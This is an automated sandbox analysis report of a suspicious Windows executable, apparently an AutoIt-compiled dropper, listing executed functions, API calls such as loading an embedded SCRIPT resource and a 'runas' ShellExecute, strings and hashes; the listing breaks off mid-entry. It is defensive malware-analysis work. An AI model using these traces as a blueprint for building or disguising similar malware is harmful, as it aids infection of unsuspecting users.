MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3%
Total number of Nodes:	2000
Total number of Limit Nodes:	38

Executed Functions

Function 009442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0094430D

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

GetCurrentProcess.KERNEL32(?,009DCB64,00000000,?,?), ref: 00944422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00944429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00944454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00944466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00944474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0094447B
GetSystemInfo.KERNEL32(?,?,?), ref: 009444A0

Strings

|O, xrefs: 009836F8
GetNativeSystemInfo, xrefs: 00944460
kernel32.dll, xrefs: 0094444F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 95832f5e2d9cd7e826c5c30200db69e4cdee977692ec10dd468a7bfb93fd4a1c
Instruction ID: e8177f93315ff11420dacce80c1e2499952592343a447933ebe027ed89c6c119
Opcode Fuzzy Hash: 95832f5e2d9cd7e826c5c30200db69e4cdee977692ec10dd468a7bfb93fd4a1c
Instruction Fuzzy Hash: 8BA1D86190E2D0CFCB51DBF97C857D97FE86B26780B08C89AD2619BB39D2248507DB21

Function 009442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009450AA,?,?,00000000,00000000), ref: 009442B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009450AA,?,?,00000000,00000000), ref: 009442C9
LoadResource.KERNEL32(?,00000000,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20), ref: 009835BE
SizeofResource.KERNEL32(?,00000000,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20), ref: 009835D3
LockResource.KERNEL32(009450AA,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20,?), ref: 009835E6

Strings

SCRIPT, xrefs: 009442BF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 173d2911d7f98de0aeb93514638123704b61c260740ad91f01f71834fc9346d6
Instruction ID: 309d6fcbabaf96fcebc0d2d8f7cdc19e6cd7e0099b1afa68d28567b2c0046221
Opcode Fuzzy Hash: 173d2911d7f98de0aeb93514638123704b61c260740ad91f01f71834fc9346d6
Instruction Fuzzy Hash: 51117CB0251701BFDB218BA5DC48F277BBDEBC5B51F10816EB52296290DBB1D840D620

Function 00982BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00942B6B

Part of subcall function 00943A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A11418,?,00942E7F,?,?,?,00000000), ref: 00943A78

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00A02224), ref: 00982C10
ShellExecuteW.SHELL32(00000000,?,?,00A02224), ref: 00982C17

Strings

runas, xrefs: 00982C0B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 4d36a3e419d841a76a483e3785a8c0fd4516c713092b0a8d5e59cddf6bfe72b9
Instruction ID: 733e1746c34547cdd5c86483a6a82bbc0c634d8be7a9f0178043239dc39e88bd
Opcode Fuzzy Hash: 4d36a3e419d841a76a483e3785a8c0fd4516c713092b0a8d5e59cddf6bfe72b9
Instruction Fuzzy Hash: F01106716483056AC704FF70D855FAEB7A8AFD2740F84482DF182021A2CF30894AC712

Function 009ADBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00985222), ref: 009ADBCE
GetFileAttributesW.KERNELBASE(?), ref: 009ADBDD
FindFirstFileW.KERNELBASE(?,?), ref: 009ADBEE
FindClose.KERNEL32(00000000), ref: 009ADBFA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 1cb3314b33f64a649ce95b44fde6f4aada879d57a94af8271179ecbae5d752fa
Instruction ID: 130e9d33e3dad1ea29848e71ade6586acece704b7da06eb39129ae9e9ebb61bf
Opcode Fuzzy Hash: 1cb3314b33f64a649ce95b44fde6f4aada879d57a94af8271179ecbae5d752fa
Instruction Fuzzy Hash: 55F0E57086A9215782206B7CED0D8AA377C9E03334B904713F9B7C24F0EBB49D94E6D5

Function 0094D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0094D807
timeGetTime.WINMM ref: 0094DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0094DB28
TranslateMessage.USER32(?), ref: 0094DB7B
DispatchMessageW.USER32(?), ref: 0094DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0094DB9F
Sleep.KERNEL32(0000000A), ref: 0094DBB1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: e414c6d9b2e2af2c90cec21e892d3367a1ce34742cb7728dba03a243eba8e341
Instruction ID: 85eadc54cb8488ad7c4859fbfa30d15c01a78189a231221706113197411aaf44
Opcode Fuzzy Hash: e414c6d9b2e2af2c90cec21e892d3367a1ce34742cb7728dba03a243eba8e341
Instruction Fuzzy Hash: CB42E37460A342EFDB28CF28C894FAAB7E8FF85314F14895DE49587291D774E844CB92

Function 00942CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00942D07
RegisterClassExW.USER32(00000030), ref: 00942D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00942D42
InitCommonControlsEx.COMCTL32(?), ref: 00942D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00942D6F
LoadIconW.USER32(000000A9), ref: 00942D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00942D94

Strings

0, xrefs: 00942CE9
+, xrefs: 00942CF0
TaskbarCreated, xrefs: 00942D37
AutoIt v3 GUI, xrefs: 00942D23

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 272209145b4ec24910355e078a0abdc7a572960c233fc6edcb20aac9a48982dc
Instruction ID: 52ee6e8f5b56a3a7a444eea0151786d15e62267a67786fec85b8a9466b71223d
Opcode Fuzzy Hash: 272209145b4ec24910355e078a0abdc7a572960c233fc6edcb20aac9a48982dc
Instruction Fuzzy Hash: 2821E3B5952309AFDB00DFE4E849BDDBBB8FB08704F00811AF621A62A0D7B10585DF90

Function 0098065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098039A: CreateFileW.KERNELBASE(00000000,00000000,?,00980704,?,?,00000000,?,00980704,00000000,0000000C), ref: 009803B7

GetLastError.KERNEL32 ref: 0098076F
__dosmaperr.LIBCMT ref: 00980776
GetFileType.KERNELBASE(00000000), ref: 00980782
GetLastError.KERNEL32 ref: 0098078C
__dosmaperr.LIBCMT ref: 00980795
CloseHandle.KERNEL32(00000000), ref: 009807B5
CloseHandle.KERNEL32(?), ref: 009808FF
GetLastError.KERNEL32 ref: 00980931
__dosmaperr.LIBCMT ref: 00980938

Strings

H, xrefs: 009808BD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cd0611830c88976a69be8c3277113469f63b3178d64ae334e7341df1d19cf8b0
Instruction ID: dbcc54237f42cb4ed7e3a251cd0224926deedc596f35680c8648088b1ed5b982
Opcode Fuzzy Hash: cd0611830c88976a69be8c3277113469f63b3178d64ae334e7341df1d19cf8b0
Instruction Fuzzy Hash: F4A15632A041048FDF19EFA8DC62BAE7BA4EB86320F14415EF8159B391DB319C57CB91

Function 0094344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00943A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A11418,?,00942E7F,?,?,?,00000000), ref: 00943A78

Part of subcall function 00943357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00943379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0094356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0098318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009831CE
RegCloseKey.ADVAPI32(?), ref: 00983210
_wcslen.LIBCMT ref: 00983277
_wcslen.LIBCMT ref: 00983286

Strings

\, xrefs: 0098328C
Include, xrefs: 00983184, 009831C5
\Include\, xrefs: 00943527
Software\AutoIt v3\AutoIt, xrefs: 00943560

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: a23464aa2f601c78a1d4bf9c6acb44d6086fc07405d9584a8adb905d432b02e5
Instruction ID: 33321b4252e80e3a27f41ff46df5d6392929360bcbee04de36725d379aebc96e
Opcode Fuzzy Hash: a23464aa2f601c78a1d4bf9c6acb44d6086fc07405d9584a8adb905d432b02e5
Instruction Fuzzy Hash: 2E718D714483019EC714EFA9DC82E9BBBE8FF85740F40882EF5558B261DB34DA59CB52

Function 00942B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00942B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00942B9D
LoadIconW.USER32(00000063), ref: 00942BB3
LoadIconW.USER32(000000A4), ref: 00942BC5
LoadIconW.USER32(000000A2), ref: 00942BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00942BEF
RegisterClassExW.USER32(?), ref: 00942C40

Part of subcall function 00942CD4: GetSysColorBrush.USER32(0000000F), ref: 00942D07
Part of subcall function 00942CD4: RegisterClassExW.USER32(00000030), ref: 00942D31
Part of subcall function 00942CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00942D42
Part of subcall function 00942CD4: InitCommonControlsEx.COMCTL32(?), ref: 00942D5F
Part of subcall function 00942CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00942D6F
Part of subcall function 00942CD4: LoadIconW.USER32(000000A9), ref: 00942D85
Part of subcall function 00942CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00942D94

Strings

#, xrefs: 00942C16
0, xrefs: 00942C0F
AutoIt v3, xrefs: 00942C2F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 38943c6c44e9e71b5b1bf66a1c59a7c06a0bd13aa1e05da622ad5e65402c435a
Instruction ID: b44dac4ed9422efc30e09dddb49fb48ecfc790b3ec7e66d906117e13a83c2d19
Opcode Fuzzy Hash: 38943c6c44e9e71b5b1bf66a1c59a7c06a0bd13aa1e05da622ad5e65402c435a
Instruction Fuzzy Hash: 73214CB0E52314ABDB50DFE5EC59BD9BFB4FB48B54F00801AF610AA6A4D3B10541DF90

Function 00943170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0094316A,?,?), ref: 009431D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0094316A,?,?), ref: 00943204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00943227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0094316A,?,?), ref: 00943232
CreatePopupMenu.USER32 ref: 00943246
PostQuitMessage.USER32(00000000), ref: 00943267

Strings

TaskbarCreated, xrefs: 0094322D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 36892af9a7f196fce29a05d4e35912a9752f1362f7d9645ded53b93bea2c86ff
Instruction ID: a00d22ba9d74decc651cd489456349df9e4bbe70bf93b7cd999e0c9a41f75d54
Opcode Fuzzy Hash: 36892af9a7f196fce29a05d4e35912a9752f1362f7d9645ded53b93bea2c86ff
Instruction Fuzzy Hash: D9415971268204ABDF146B789C4DFF93B1DE749300F04C126FA228A2A5D7B59B81D7A1

Function 00978D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954be8d021fa824aae2caf09919035cb6a754c1693588d370b2f34b699c53fe9
Instruction ID: e19b02a219a0aa5bde91900605a4fd92856846bffde96ac19e6dded77693ec42
Opcode Fuzzy Hash: 954be8d021fa824aae2caf09919035cb6a754c1693588d370b2f34b699c53fe9
Instruction Fuzzy Hash: C9C1E276A04249AFCB11DFACD855BAEBBB4FF4A310F048099E518A7392C7749942CF61

Function 01BC2640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01BC2711
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01BC2937

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: a7f90e25e327b0f658c249558baa4f320eca7d87e235df4ea11c0da2981ac0d9
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: 51A10774E00209EBDB18CFA4C994BEEBBB5FF48704F20819DE615BB281D7759A41CB94

Function 00942C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00942C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00942CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00941CAD,?), ref: 00942CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00941CAD,?), ref: 00942CCF

Strings

edit, xrefs: 00942CAC
AutoIt v3, xrefs: 00942C89, 00942C8E, 00942C8F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1ce2ff005ed2c516985342402d66a504e6aa45483352a1936cbf20bddf9ddd80
Instruction ID: 59fd36d3e81845608e0ec6ac962d02a60ec543a71138fd0f3d733e20bd37193b
Opcode Fuzzy Hash: 1ce2ff005ed2c516985342402d66a504e6aa45483352a1936cbf20bddf9ddd80
Instruction Fuzzy Hash: 0FF03AB95802A07AEB704753AC0CEB76EBDD7C6F50B00811AFA10AA2A4C2610842DAB0

Function 01BC2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01BC2300: Sleep.KERNELBASE(000001F4), ref: 01BC2311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01BC252B

Strings

5S2R3G3YSEK91FYPB50, xrefs: 01BC258E, 01BC2591

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID: CreateFileSleep
String ID: 5S2R3G3YSEK91FYPB50
API String ID: 2694422964-1853076741
Opcode ID: 8336b097b4d89c71ee4fe42e5c2ebf023997c7730ba97291b17218a55833900e
Instruction ID: ab2cc254cd6a2369fc00edc6064c85e4efa3b654900dcef966c4d6e4bcb1f17c
Opcode Fuzzy Hash: 8336b097b4d89c71ee4fe42e5c2ebf023997c7730ba97291b17218a55833900e
Instruction Fuzzy Hash: 62516D31D04249EAEF15DBA4C854BEFBB79AF18700F0041D9E609BB2C1D7B94B49CBA5

Function 009B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2C05
DeleteFileW.KERNEL32(?), ref: 009B2C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2CC0

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 5f3507f76f7ce210464f8dcf1dd68ea38984beb5e544c4b783fac6da21b21009
Instruction ID: 503b7e74c3fa86c2e64289b8da60b9f336409928bbf0c325cbf32a016dde0dc9
Opcode Fuzzy Hash: 5f3507f76f7ce210464f8dcf1dd68ea38984beb5e544c4b783fac6da21b21009
Instruction Fuzzy Hash: 56B14D72D01129ABDF21DBA4CD85FDEBBBDEF89350F1040A6F609E6151EB309A448F61

Function 00943B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B61
